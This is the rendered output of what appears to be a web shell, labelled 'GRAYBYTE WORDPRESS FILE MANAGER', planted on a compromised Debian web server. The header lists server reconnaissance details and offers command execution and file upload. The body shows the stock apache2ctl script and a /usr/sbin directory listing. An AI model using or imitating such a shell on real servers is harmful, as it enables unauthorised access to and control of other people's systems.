GRAYBYTE WORDPRESS FILE MANAGER4726

Server IP : 3.104.188.249 / Your IP : 216.73.217.141
System : Linux ip-172-26-1-242 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
PHP Version : 8.3.31
Disable Function : NONE
cURL : ON | WGET : ON | Sudo : ON | Pkexec : OFF
Directory : /usr/sbin/
Upload Files :
Current_dir [ Not Writeable ] Document_root [ Writeable ]

Command :


Current File : /usr/sbin//apache2ctl
#!/bin/sh
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements.  See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License.  You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
# Apache control script designed to allow an easy command line interface
# to controlling Apache.  Written by Marc Slemko, 1997/08/23
#
# Heavily modified for Debian by Stefan Fritsch 2007-2010
# 
# The exit codes returned are:
#   XXX this doc is no longer correct now that the interesting
#   XXX functions are handled by httpd
#	0 - operation completed successfully
#	1 - 
#	2 - usage error
#	3 - httpd could not be started
#	4 - httpd could not be stopped
#	5 - httpd could not be started during a restart
#	6 - httpd could not be restarted during a restart
#	7 - httpd could not be restarted during a graceful restart
#	8 - configuration syntax error
#
# When multiple arguments are given, only the error from the _last_
# one is reported.  Run "apachectl help" for usage info
#
ARGV="$@"
#
# |||||||||||||||||||| START CONFIGURATION SECTION  ||||||||||||||||||||
# --------------------                              --------------------
#
# main configuration directory
if test -z "$APACHE_CONFDIR" ; then
	if test "${0##*apache2ctl-}" != "$0" ; then
		APACHE_CONFDIR="/etc/apache2-${0##*apache2ctl-}"
	else
		APACHE_CONFDIR=/etc/apache2
	fi
fi

SUFFIX="${APACHE_CONFDIR##/etc/apache2-}"
case "$SUFFIX" in
	/etc/apache2)
		SUFFIX=""
		;;
	*)
		SUFFIX="@$SUFFIX"
		;;
esac
APACHE_SYSTEMD_SERVICE="apache2$SUFFIX"

# the path to the environment variable file
test -z "$APACHE_ENVVARS" && APACHE_ENVVARS="$APACHE_CONFDIR/envvars"
# pick up any necessary environment variables
if test -f $APACHE_ENVVARS; then
  . $APACHE_ENVVARS
fi

if test "$APACHE_CONFDIR" != /etc/apache2 ; then
	APACHE_ARGUMENTS="-d $APACHE_CONFDIR $APACHE_ARGUMENTS"
fi
# the following APACHE_* variables should be set in /etc/apache2/envvars
#
# the path to your httpd binary, including options if necessary
HTTPD=${APACHE_HTTPD:-/usr/sbin/apache2}
#
# a command that outputs a formatted text version of the HTML at the
# url given on the command line.  Designed for lynx, however other
# programs may work.  
LYNX="${APACHE_LYNX:-www-browser -dump}"
#
# the URL to your server's mod_status status page.  If you do not
# have one, then status and fullstatus will not work.
STATUSURL="${APACHE_STATUSURL:-http://localhost:80/server-status}"
#
# Set this variable to a command that increases the maximum
# number of file descriptors allowed per child process. This is
# critical for configurations that use many file descriptors,
# such as mass vhosting, or a multithreaded server.
ULIMIT_MAX_FILES="${APACHE_ULIMIT_MAX_FILES:-ulimit -n 8192}"
# --------------------                              --------------------
# ||||||||||||||||||||   END CONFIGURATION SECTION  ||||||||||||||||||||

# Set the maximum number of file descriptors allowed per child process.
if [ "x$ULIMIT_MAX_FILES" != "x" ] && [ `id -u` -eq 0 ] ; then
    if ! $ULIMIT_MAX_FILES ; then
        echo Setting ulimit failed. See README.Debian for more information. >&2
    fi
fi

ERROR=0
if [ "x$ARGV" = "x" ] || [ "x$ARGV" = "xusage" ] || [ "x$ARGV" = "xhelp" ] || [ "x$ARGV" = "x--help" ]; then 
    echo "Usage: $0 start|stop|restart|graceful|graceful-stop|configtest|status|fullstatus|help" >&2
    echo "       $0 <apache2 args>" >&2
    echo "       $0 -h            (for help on <apache2 args>)" >&2
    exit 1
fi

get_status () {
    if ! $LYNX $STATUSURL ; then
        echo "'$LYNX $STATUSURL'" failed. >&2
        echo Maybe you need to install a package providing www-browser or you >&2
        echo need to adjust the APACHE_LYNX variable in /etc/apache2/envvars >&2
        exit 1
    fi
}

mkdir_chown () {
    local OWNER="$1"
    local DIR="$2"
    local STAT="$(LC_ALL=C stat -c %F:%U $DIR 2> /dev/null || true)"
    if [ "$STAT" = "" ] ; then
        local TMPNAME=$(mktemp -d $DIR.XXXXXXXXXX) || exit 1
        chmod 755 $TMPNAME || exit 1
        chown $OWNER $TMPNAME || exit 1
        if ! mv -T $TMPNAME $DIR 2> /dev/null; then
            rmdir $TMPNAME
            # check for race with other apachectl
            if [ "$(LC_ALL=C stat -c %F:%U $DIR 2>/dev/null)" != "directory:$OWNER" ]
            then
                echo Cannot create $DIR with owner $OWNER.
                echo Please fix manually. Aborting.
                exit 1
            fi
        fi
    elif [ "$STAT" != "directory:$OWNER" ] ; then
        echo $DIR already exists but is not a directory owned by $OWNER.
        echo Please fix manually. Aborting.
        exit 1
    fi
}


[ ! -d ${APACHE_RUN_DIR:-/var/run/apache2} ] && mkdir -p ${APACHE_RUN_DIR:-/var/run/apache2}
[ ! -d ${APACHE_RUN_DIR:-/var/run/apache2}/socks ] && mkdir_chown ${APACHE_RUN_USER:-www-data} ${APACHE_RUN_DIR:-/var/run/apache2}/socks
[ ! -d ${APACHE_LOCK_DIR:-/var/lock/apache2} ] && mkdir_chown ${APACHE_RUN_USER:-www-data} ${APACHE_LOCK_DIR:-/var/lock/apache2}

case "$ARGV" in
start)
    # ssl_scache shouldn't be here if we're just starting up.
    # (this is bad if there are several apache2 instances running)
    rm -f ${APACHE_RUN_DIR:-/var/run/apache2}/*ssl_scache*

    need_systemd=false
    if [ -z "$APACHE_STARTED_BY_SYSTEMD" ] ; then
        case "$(readlink -f /proc/1/exe)" in
        *systemd*)
            need_systemd=true
            ;;
        *)
            ;;
        esac
    fi
    if $need_systemd ; then
        # If running on systemd we should not start httpd without systemd
        # or systemd will get confused about the status of httpd.
        echo "Invoking 'systemctl start $APACHE_SYSTEMD_SERVICE'."
        echo "Use 'systemctl status $APACHE_SYSTEMD_SERVICE' for more info."
        systemctl start "$APACHE_SYSTEMD_SERVICE"
    else
        unset APACHE_STARTED_BY_SYSTEMD
        $HTTPD ${APACHE_ARGUMENTS} -k "$ARGV"
    fi

    ERROR=$?
    ;;
stop|graceful-stop)
    $HTTPD ${APACHE_ARGUMENTS} -k "$ARGV"
    ERROR=$?
    ;;
restart|graceful)
    if $HTTPD ${APACHE_ARGUMENTS} -t 2> /dev/null ; then
        $HTTPD ${APACHE_ARGUMENTS} -k "$ARGV"
    else
        $HTTPD ${APACHE_ARGUMENTS} -t
    fi
    ERROR=$?
    ;;
startssl|sslstart|start-SSL)
    echo The startssl option is no longer supported.
    echo Please edit httpd.conf to include the SSL configuration settings
    echo and then use "apachectl start".
    ERROR=2
    ;;
configtest)
    $HTTPD ${APACHE_ARGUMENTS} -t
    ERROR=$?
    ;;
status)
    get_status | awk ' /process$/ { print; exit } { print } '
    ;;
fullstatus)
    get_status
    ;;
*)
    $HTTPD ${APACHE_ARGUMENTS} "$@"
    ERROR=$?
esac

if [ "$ERROR" != 0 ] ; then
	echo Action \'"$@"\' failed.
	echo The Apache error log may have more information.
fi
exit $ERROR

[ Back ]
Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
May 18 2026 04:23:05
root / root
0755
a2disconf
15.858 KB
June 05 2026 10:55:53
root / root
0755
a2dismod
15.858 KB
June 05 2026 10:55:53
root / root
0755
a2dissite
15.858 KB
June 05 2026 10:55:53
root / root
0755
a2enconf
15.858 KB
June 05 2026 10:55:53
root / root
0755
a2enmod
15.858 KB
June 05 2026 10:55:53
root / root
0755
a2ensite
15.858 KB
June 05 2026 10:55:53
root / root
0755
a2query
9.601 KB
June 05 2026 10:55:53
root / root
0755
aa-remove-unknown
3.13 KB
February 14 2023 11:49:15
root / root
0755
aa-status
38.305 KB
February 14 2023 11:49:15
root / root
0755
aa-teardown
0.134 KB
November 22 2022 00:54:32
root / root
0755
accessdb
14.461 KB
March 12 2023 22:23:59
root / root
0755
add-shell
1.028 KB
July 28 2023 23:46:35
root / root
0755
addgnupghome
3.003 KB
January 01 2026 14:54:00
root / root
0755
addgroup
47.248 KB
May 25 2023 15:54:35
root / root
0755
adduser
47.248 KB
May 25 2023 15:54:35
root / root
0755
agetty
67.492 KB
November 21 2024 20:01:54
root / root
0755
apache2
716.531 KB
June 05 2026 10:55:53
root / root
0755
apache2ctl
7.193 KB
June 05 2026 10:55:53
root / root
0755
apachectl
7.193 KB
June 05 2026 10:55:53
root / root
0755
apparmor_parser
1.39 MB
February 14 2023 11:49:15
root / root
0755
apparmor_status
38.305 KB
February 14 2023 11:49:15
root / root
0755
applygnupgdefaults
2.165 KB
January 01 2026 14:54:00
root / root
0755
arpd
104.477 KB
May 22 2023 13:19:52
root / root
0755
arptables
223.156 KB
January 16 2023 13:44:37
root / root
0755
arptables-nft
223.156 KB
January 16 2023 13:44:37
root / root
0755
arptables-nft-restore
223.156 KB
January 16 2023 13:44:37
root / root
0755
arptables-nft-save
223.156 KB
January 16 2023 13:44:37
root / root
0755
arptables-restore
223.156 KB
January 16 2023 13:44:37
root / root
0755
arptables-save
223.156 KB
January 16 2023 13:44:37
root / root
0755
badblocks
34.25 KB
June 06 2025 17:12:48
root / root
0755
blkdeactivate
15.964 KB
October 19 2022 19:37:31
root / root
0755
blkdiscard
34.313 KB
November 21 2024 20:01:54
root / root
0755
blkid
122.344 KB
November 21 2024 20:01:54
root / root
0755
blkzone
78.313 KB
November 21 2024 20:01:54
root / root
0755
blockdev
78.313 KB
November 21 2024 20:01:54
root / root
0755
bridge
152.539 KB
May 22 2023 13:19:52
root / root
0755
capsh
53.289 KB
May 07 2026 21:10:44
root / root
0755
cfdisk
106.664 KB
November 21 2024 20:01:54
root / root
0755
cgdisk
210.406 KB
October 16 2022 12:32:11
root / root
0755
chcpu
46.305 KB
November 21 2024 20:01:54
root / root
0755
check_forensic
0.93 KB
April 26 2011 15:10:00
root / root
0755
chgpasswd
66.289 KB
December 14 2025 14:00:01
root / root
0755
chmem
66.313 KB
November 21 2024 20:01:54
root / root
0755
chpasswd
62.359 KB
December 14 2025 14:00:01
root / root
0755
chroot
46.984 KB
September 20 2022 15:27:27
root / root
0755
cpgr
60.43 KB
December 14 2025 14:00:01
root / root
0755
cppw
60.43 KB
December 14 2025 14:00:01
root / root
0755
ctrlaltdel
38.305 KB
November 21 2024 20:01:54
root / root
0755
dbconfig-generate-include
12.359 KB
February 16 2023 12:37:55
root / root
0755
dbconfig-load-include
5.57 KB
February 16 2023 12:37:55
root / root
0755
dcb
144.602 KB
May 22 2023 13:19:52
root / root
0755
debugfs
233.828 KB
June 06 2025 17:12:48
root / root
0755
delgroup
16.335 KB
May 25 2023 15:54:35
root / root
0755
deluser
16.335 KB
May 25 2023 15:54:35
root / root
0755
depmod
174.266 KB
December 10 2022 00:02:24
root / root
0755
devlink
220.977 KB
May 22 2023 13:19:52
root / root
0755
dhclient
2.63 MB
April 17 2023 12:20:02
root / root
0755
dhclient-script
14.209 KB
April 17 2023 12:20:02
root / root
0755
dmsetup
166.977 KB
October 19 2022 19:37:31
root / root
0755
dmstats
166.977 KB
October 19 2022 19:37:31
root / root
0755
dpkg-fsys-usrunmess
16.993 KB
March 07 2026 12:15:41
root / root
0755
dpkg-preconfigure
3.833 KB
January 08 2023 21:50:51
root / root
0755
dpkg-reconfigure
4.38 KB
January 08 2023 21:50:51
root / root
0755
dumpe2fs
30.313 KB
June 06 2025 17:12:48
root / root
0755
e2freefrag
14.305 KB
June 06 2025 17:12:48
root / root
0755
e2fsck
348.266 KB
June 06 2025 17:12:48
root / root
0755
e2image
54.453 KB
June 06 2025 17:12:48
root / root
0755
e2label
114.516 KB
June 06 2025 17:12:48
root / root
0755
e2mmpstatus
30.313 KB
June 06 2025 17:12:48
root / root
0755
e2scrub
7.123 KB
June 06 2025 17:12:48
root / root
0755
e2scrub_all
5.268 KB
June 06 2025 17:12:48
root / root
0755
e2undo
22.305 KB
June 06 2025 17:12:48
root / root
0755
e4crypt
26.305 KB
June 06 2025 17:12:48
root / root
0755
e4defrag
30.234 KB
June 06 2025 17:12:48
root / root
0755
ebsnvme-id
6.891 KB
February 14 2022 17:36:14
root / root
0755
ebtables
223.156 KB
January 16 2023 13:44:37
root / root
0755
ebtables-nft
223.156 KB
January 16 2023 13:44:37
root / root
0755
ebtables-nft-restore
223.156 KB
January 16 2023 13:44:37
root / root
0755
ebtables-nft-save
223.156 KB
January 16 2023 13:44:37
root / root
0755
ebtables-restore
223.156 KB
January 16 2023 13:44:37
root / root
0755
ebtables-save
223.156 KB
January 16 2023 13:44:37
root / root
0755
ebtables-translate
223.156 KB
January 16 2023 13:44:37
root / root
0755
ethtool
592.445 KB
December 20 2022 11:18:39
root / root
0755
faillock
14.242 KB
August 10 2025 15:54:02
root / root
0755
fdisk
158.352 KB
November 21 2024 20:01:54
root / root
0755
filefrag
18.258 KB
June 06 2025 17:12:48
root / root
0755
findfs
14.305 KB
November 21 2024 20:01:54
root / root
0755
fixparts
74.398 KB
October 16 2022 12:32:11
root / root
0755
fsck
54.359 KB
November 21 2024 20:01:54
root / root
0755
fsck.cramfs
42.367 KB
November 21 2024 20:01:54
root / root
0755
fsck.ext2
348.266 KB
June 06 2025 17:12:48
root / root
0755
fsck.ext3
348.266 KB
June 06 2025 17:12:48
root / root
0755
fsck.ext4
348.266 KB
June 06 2025 17:12:48
root / root
0755
fsck.minix
122.336 KB
November 21 2024 20:01:54
root / root
0755
fsfreeze
14.305 KB
November 21 2024 20:01:54
root / root
0755
fstab-decode
14.234 KB
April 03 2023 06:25:22
root / root
0755
fstrim
74.313 KB
November 21 2024 20:01:54
root / root
0755
gdisk
218.406 KB
October 16 2022 12:32:11
root / root
0755
genl
116.508 KB
May 22 2023 13:19:52
root / root
0755
getcap
14.234 KB
May 07 2026 21:10:44
root / root
0755
getpcaps
14.234 KB
May 07 2026 21:10:44
root / root
0755
getty
67.492 KB
November 21 2024 20:01:54
root / root
0755
groupadd
99.039 KB
December 14 2025 14:00:01
root / root
0755
groupdel
86.852 KB
December 14 2025 14:00:01
root / root
0755
groupmems
66.328 KB
December 14 2025 14:00:01
root / root
0755
groupmod
99.008 KB
December 14 2025 14:00:01
root / root
0755
grpck
66.297 KB
December 14 2025 14:00:01
root / root
0755
grpconv
58.141 KB
December 14 2025 14:00:01
root / root
0755
grpunconv
58.141 KB
December 14 2025 14:00:01
root / root
0755
grub-install
1.15 MB
April 01 2026 20:03:46
root / root
0755
grub-macbless
931.477 KB
April 01 2026 20:03:46
root / root
0755
grub-mkconfig
8.457 KB
April 01 2026 20:03:46
root / root
0755
grub-mkdevicemap
216.758 KB
April 01 2026 20:03:46
root / root
0755
grub-probe
939.789 KB
April 01 2026 20:03:46
root / root
0755
grub-reboot
4.728 KB
April 01 2026 20:03:46
root / root
0755
grub-set-default
3.473 KB
April 01 2026 20:03:46
root / root
0755
halt
1.29 MB
April 27 2026 19:48:55
root / root
0755
httxt2dbm
14.234 KB
June 05 2026 10:55:53
root / root
0755
hwclock
86.438 KB
November 21 2024 20:01:54
root / root
0755
iconvconfig
30.844 KB
April 27 2026 20:14:33
root / root
0755
init
90.375 KB
April 27 2026 19:48:55
root / root
0755
insmod
174.266 KB
December 10 2022 00:02:24
root / root
0755
install-sgmlcatalog
4.444 KB
October 06 2022 18:03:38
root / root
0755
installkernel
2.597 KB
July 28 2023 23:46:35
root / root
0755
invoke-rc.d
16.13 KB
July 04 2022 10:14:09
root / root
0755
ip
674.82 KB
May 22 2023 13:19:52
root / root
0755
ip6tables
223.156 KB
January 16 2023 13:44:37
root / root
0755
ip6tables-apply
6.872 KB
January 12 2023 10:27:35
root / root
0755
ip6tables-legacy
88.977 KB
January 16 2023 13:44:37
root / root
0755
ip6tables-legacy-restore
88.977 KB
January 16 2023 13:44:37
root / root
0755
ip6tables-legacy-save
88.977 KB
January 16 2023 13:44:37
root / root
0755
ip6tables-nft
223.156 KB
January 16 2023 13:44:37
root / root
0755
ip6tables-nft-restore
223.156 KB
January 16 2023 13:44:37
root / root
0755
ip6tables-nft-save
223.156 KB
January 16 2023 13:44:37
root / root
0755
ip6tables-restore
223.156 KB
January 16 2023 13:44:37
root / root
0755
ip6tables-restore-translate
223.156 KB
January 16 2023 13:44:37
root / root
0755
ip6tables-save
223.156 KB
January 16 2023 13:44:37
root / root
0755
ip6tables-translate
223.156 KB
January 16 2023 13:44:37
root / root
0755
iptables
223.156 KB
January 16 2023 13:44:37
root / root
0755
iptables-apply
6.872 KB
January 12 2023 10:27:35
root / root
0755
iptables-legacy
88.977 KB
January 16 2023 13:44:37
root / root
0755
iptables-legacy-restore
88.977 KB
January 16 2023 13:44:37
root / root
0755
iptables-legacy-save
88.977 KB
January 16 2023 13:44:37
root / root
0755
iptables-nft
223.156 KB
January 16 2023 13:44:37
root / root
0755
iptables-nft-restore
223.156 KB
January 16 2023 13:44:37
root / root
0755
iptables-nft-save
223.156 KB
January 16 2023 13:44:37
root / root
0755
iptables-restore
223.156 KB
January 16 2023 13:44:37
root / root
0755
iptables-restore-translate
223.156 KB
January 16 2023 13:44:37
root / root
0755
iptables-save
223.156 KB
January 16 2023 13:44:37
root / root
0755
iptables-translate
223.156 KB
January 16 2023 13:44:37
root / root
0755
isosize
30.313 KB
November 21 2024 20:01:54
root / root
0755
killall5
26.313 KB
April 03 2023 06:25:22
root / root
0755
ldattach
34.313 KB
November 21 2024 20:01:54
root / root
0755
ldconfig
959.844 KB
April 27 2026 20:14:33
root / root
0755
locale-gen
1.378 KB
April 27 2026 20:14:33
root / root
0755
logsave
14.086 KB
June 06 2025 17:12:48
root / root
0755
losetup
114.422 KB
November 21 2024 20:01:54
root / root
0755
lsmod
174.266 KB
December 10 2022 00:02:24
root / root
0755
make-ssl-cert
6.652 KB
December 30 2021 16:52:53
root / root
0755
mariadbd
25.79 MB
August 30 2025 17:17:22
root / root
0755
mke2fs
138.578 KB
June 06 2025 17:12:48
root / root
0755
mkfs
14.305 KB
November 21 2024 20:01:54
root / root
0755
mkfs.bfs
34.313 KB
November 21 2024 20:01:54
root / root
0755
mkfs.cramfs
42.242 KB
November 21 2024 20:01:54
root / root
0755
mkfs.ext2
138.578 KB
June 06 2025 17:12:48
root / root
0755
mkfs.ext3
138.578 KB
June 06 2025 17:12:48
root / root
0755
mkfs.ext4
138.578 KB
June 06 2025 17:12:48
root / root
0755
mkfs.minix
110.32 KB
November 21 2024 20:01:54
root / root
0755
mkhomedir_helper
22.266 KB
August 10 2025 15:54:02
root / root
0755
mkinitramfs
12.399 KB
April 26 2025 20:00:24
root / root
0755
mklost+found
14.234 KB
June 06 2025 17:12:48
root / root
0755
mkswap
114.313 KB
November 21 2024 20:01:54
root / root
0755
modinfo
174.266 KB
December 10 2022 00:02:24
root / root
0755
modprobe
174.266 KB
December 10 2022 00:02:24
root / root
0755
mysqld
25.79 MB
August 30 2025 17:17:22
root / root
0755
netplan
0.779 KB
February 09 2023 08:15:50
root / root
0755
newusers
102.922 KB
December 14 2025 14:00:01
root / root
0755
nfnl_osf
18.227 KB
January 16 2023 13:44:37
root / root
0755
nologin
14.227 KB
December 14 2025 14:00:01
root / root
0755
pam-auth-update
20.789 KB
August 10 2025 15:54:02
root / root
0755
pam_getenv
2.822 KB
August 10 2025 15:54:02
root / root
0755
pam_namespace_helper
0.456 KB
August 10 2025 15:54:02
root / root
0755
pam_timestamp_check
14.242 KB
August 10 2025 15:54:02
root / root
0755
phpdismod
7.107 KB
July 13 2022 08:19:37
root / root
0755
phpenmod
7.107 KB
July 13 2022 08:19:37
root / root
0755
phpquery
6.239 KB
July 13 2022 08:19:37
root / root
0755
pivot_root
14.305 KB
November 21 2024 20:01:54
root / root
0755
poweroff
1.29 MB
April 27 2026 19:48:55
root / root
0755
pwck
58.258 KB
December 14 2025 14:00:01
root / root
0755
pwconv
54.133 KB
December 14 2025 14:00:01
root / root
0755
pwhistory_helper
18.242 KB
August 10 2025 15:54:02
root / root
0755
pwunconv
54.172 KB
December 14 2025 14:00:01
root / root
0755
readprofile
34.344 KB
November 21 2024 20:01:54
root / root
0755
reboot
1.29 MB
April 27 2026 19:48:55
root / root
0755
remove-shell
1.085 KB
July 28 2023 23:46:35
root / root
0755
resize2fs
62.305 KB
June 06 2025 17:12:48
root / root
0755
resolvconf
146.531 KB
April 27 2026 19:48:55
root / root
0755
rmmod
174.266 KB
December 10 2022 00:02:24
root / root
0755
rmt
59.016 KB
January 20 2024 09:27:07
root / root
0755
rmt-tar
59.016 KB
January 20 2024 09:27:07
root / root
0755
rtacct
44.367 KB
May 22 2023 13:19:52
root / root
0755
rtcwake
46.313 KB
November 21 2024 20:01:54
root / root
0755
rtmon
112.445 KB
May 22 2023 13:19:52
root / root
0755
runlevel
1.29 MB
April 27 2026 19:48:55
root / root
0755
runuser
70.313 KB
November 21 2024 20:01:54
root / root
0755
service
8.894 KB
August 20 2025 18:58:21
root / root
0755
setcap
14.234 KB
May 07 2026 21:10:44
root / root
0755
sfdisk
142.305 KB
November 21 2024 20:01:54
root / root
0755
sgdisk
202.406 KB
October 16 2022 12:32:11
root / root
0755
shadowconfig
2.22 KB
December 14 2025 14:00:01
root / root
0755
shutdown
1.29 MB
April 27 2026 19:48:55
root / root
0755
split-logfile
2.358 KB
June 05 2026 10:55:53
root / root
0755
sshd
1.21 MB
May 05 2026 10:26:56
root / root
0755
start-stop-daemon
43.422 KB
March 07 2026 12:15:41
root / root
0755
sudo_logsrvd
244.57 KB
April 11 2026 12:01:23
root / root
0755
sudo_sendlog
151.414 KB
April 11 2026 12:01:23
root / root
0755
sulogin
54.313 KB
November 21 2024 20:01:54
root / root
0755
swaplabel
18.305 KB
November 21 2024 20:01:54
root / root
0755
swapoff
22.305 KB
November 21 2024 20:01:54
root / root
0755
swapon
50.305 KB
November 21 2024 20:01:54
root / root
0755
switch_root
18.305 KB
November 21 2024 20:01:54
root / root
0755
sysctl
30.313 KB
December 19 2022 06:06:38
root / root
0755
tarcat
0.914 KB
January 20 2024 09:27:07
root / root
0755
tc
574 KB
May 22 2023 13:19:52
root / root
0755
tcptraceroute
1.557 KB
February 25 2023 12:24:47
root / root
0755
tcptraceroute.db
1.557 KB
February 25 2023 12:24:47
root / root
0755
telinit
1.29 MB
April 27 2026 19:48:55
root / root
0755
tipc
152.602 KB
May 22 2023 13:19:52
root / root
0755
traceroute
71.234 KB
February 25 2023 12:24:47
root / root
0755
tune2fs
114.516 KB
June 06 2025 17:12:48
root / root
0755
unix_chkpwd
38.242 KB
August 10 2025 15:54:02
root / shadow
2755
unix_update
38.242 KB
August 10 2025 15:54:02
root / root
0755
update-ca-certificates
5.291 KB
June 13 2025 08:03:42
root / root
0755
update-catalog
9.173 KB
October 06 2022 18:03:38
root / root
0755
update-grub
0.063 KB
March 31 2026 19:41:38
root / root
0755
update-grub2
0.063 KB
March 31 2026 19:41:38
root / root
0755
update-initramfs
6.746 KB
April 24 2025 15:40:53
root / root
0755
update-locale
2.991 KB
April 27 2026 20:14:33
root / root
0755
update-passwd
38.492 KB
September 20 2022 10:22:51
root / root
0755
update-pciids
1.712 KB
January 17 2023 23:50:53
root / root
0755
update-rc.d
17.326 KB
August 20 2025 18:56:49
root / root
0755
update-secureboot-policy
5.133 KB
May 25 2019 01:26:08
root / root
0755
update-shells
3.891 KB
July 28 2023 23:46:35
root / root
0755
update-xmlcatalog
16.879 KB
February 27 2019 00:18:49
root / root
0755
useradd
155.797 KB
December 14 2025 14:00:01
root / root
0755
userdel
110.945 KB
December 14 2025 14:00:01
root / root
0755
usermod
143.609 KB
December 14 2025 14:00:01
root / root
0755
uuidd
38.813 KB
November 21 2024 20:01:54
root / root
0755
validlocale
1.731 KB
April 27 2026 20:14:33
root / root
0755
vdpa
116.664 KB
May 22 2023 13:19:52
root / root
0755
vigr
72.641 KB
December 14 2025 14:00:01
root / root
0755
vipw
72.641 KB
December 14 2025 14:00:01
root / root
0755
visudo
256.625 KB
April 11 2026 12:01:23
root / root
0755
wipefs
46.313 KB
November 21 2024 20:01:54
root / root
0755
xtables-legacy-multi
88.977 KB
January 16 2023 13:44:37
root / root
0755
xtables-monitor
223.156 KB
January 16 2023 13:44:37
root / root
0755
xtables-nft-multi
223.156 KB
January 16 2023 13:44:37
root / root
0755
zic
58.727 KB
April 27 2026 20:14:33
root / root
0755
zramctl
114.422 KB
November 21 2024 20:01:54
root / root
0755

GRAYBYTE WORDPRESS FILE MANAGER @ 2025
CONTACT ME
Static GIF